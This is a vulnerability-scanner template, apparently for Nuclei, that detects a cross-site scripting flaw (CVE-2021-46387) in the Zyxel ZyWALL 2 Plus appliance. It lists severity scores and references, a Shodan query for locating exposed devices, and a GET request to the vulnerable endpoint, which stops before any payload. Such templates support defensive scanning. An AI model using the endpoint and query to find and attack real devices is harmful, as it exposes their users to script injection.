id: CVE-2021-46387 info: name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting author: DhiyaneshDk severity: medium description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks. reference: - https://www.exploit-db.com/exploits/50797 - https://www.zyxel.com/us/en/support/security_advisories.shtml - https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing - https://nvd.nist.gov/vuln/detail/CVE-2021-46387 - https://www.zyxel.com/uk/en/products_services/zywall_2_plus.shtml classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-46387 cwe-id: CWE-79 epss-score: 0.00455 cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Zywall2Plus" vendor: zyxel product: zywall_2_plus_internet_security_appliance_firmware tags: cve,cve2021,xss,zyxel,edb http: - method: GET path: - '{{BaseURL}}/Forms/rpAuth_1?id=